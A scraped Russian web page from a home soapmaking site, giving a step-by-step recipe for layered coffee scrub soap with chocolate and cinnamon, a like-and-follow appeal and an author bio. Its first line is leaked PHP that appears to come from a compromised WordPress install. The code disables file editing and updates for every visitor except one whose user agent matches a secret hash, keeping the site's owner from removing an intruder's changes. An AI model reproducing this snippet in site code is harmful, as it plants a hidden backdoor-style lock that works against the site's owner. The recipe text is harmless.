if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Кофейное мыло-скраб с шоколадом и корицей | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Кофейное мыло-скраб с шоколадом и корицей

Такое мыло поможет очистить кожу от ороговевшей ткани, придав ей неповторимый аромат!

Этот рецепт мыла с кофе обла­да­ет скраб-эффек­том и помо­жет очи­стить кожу от оро­го­вев­шей тка­ни. Мыло полу­чит­ся очень аро­мат­ным бла­го­да­ря добав­ле­нию кофе!

Для созда­ния тако­го мыла понадобятся:

  • Мыль­ная осно­ва (по раз­ме­ру и коли­че­ству жела­е­мых кусочков);
  • Фор­ма;
  • Шоко­лад;
  • Моло­тый кофе;
  • Кори­ца;
  • Нож, емкость, спирт.
  1. Часть мыль­ной осно­вы рас­пла­вить с добав­ле­ни­ем шоко­ла­да, вылить на две ров­ные поверх­но­сти. После засты­ва­ния одну скру­тить руле­ти­ком, поло­жить в кон­тей­нер, свер­ху налить спирт, а вто­рую про­из­воль­но нарезать.
    кофейное4
  2. Рас­то­пить 2/3 осно­вы, вылить на руле­тик и оста­вить застывать.
  3. После обре­зать руле­тик, оста­вив на нем немно­го мыль­ной осно­вы, обре­зан­ный мате­ри­ал рас­то­пить, доба­вив кофе.
  4. Остав­шу­ю­ся осно­ву так­же растопить.
  5. Наре­зан­ный ранее пласт побрыз­гать спир­том и уло­жить в фор­му, доба­вить неко­то­рое коли­че­ство осно­вы, выло­жить руле­тик и залить кофей­ной мас­сой. Оста­вить до обра­зо­ва­ния плен­ки, после – посы­пать кори­цей и сбрыз­нуть спиртом.
  6. Чере­дуя кофей­ные и обыч­ные слои, залить фор­му, и оста­вить мыло застывать.
    кофейное3

И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия

Обожаю в свободное время заниматься мыловарением. Уже съела на этом целую собаку! Вот теперь спешу поделиться с вами своими работами ;) Читайте все мои записи!